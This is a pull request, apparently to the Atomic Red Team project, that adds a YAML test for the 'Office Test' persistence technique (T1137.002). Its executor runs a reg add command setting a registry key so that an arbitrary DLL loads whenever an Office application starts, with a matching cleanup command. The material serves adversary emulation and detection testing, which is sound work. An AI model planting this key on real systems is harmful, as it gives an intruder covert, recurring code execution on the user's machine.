### PR TITLE
[OSCD] Office persiststence :  Office test

### DIFF
--- a/atomics/T1137.002/T1137.002.yaml
+++ b/atomics/T1137.002/T1137.002.yaml
@@ -1,0 +1,17 @@
+- name: Office Apllication Startup Test Persistence
+  description: |
+    Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office
+    application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives.
+  supported_platforms:
+  - windows
+  input_arguments:
+    thing_to_execute:
+      description: Thing to Run
+      type: Path
+      default: C:\Path\AtomicRedTeam.dll
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}"
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
+    name: command_prompt

--- a/atomics/T1137.002/T1137.002.yaml
+++ b/atomics/T1137.002/T1137.002.yaml
@@ -1,3 +1,6 @@
+attack_technique: T1137.002
+display_name: 'Office Application Startup: Office Test'
+atomic_tests:
 - name: Office Apllication Startup Test Persistence
   description: |
     Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office


### PR DESCRIPTION
**Details:**
office persistence test registry. Opening MS office after setting this registry would load the Arbitrary DLL
**Testing:**
Works successfully

**Associated Issues:**
None observed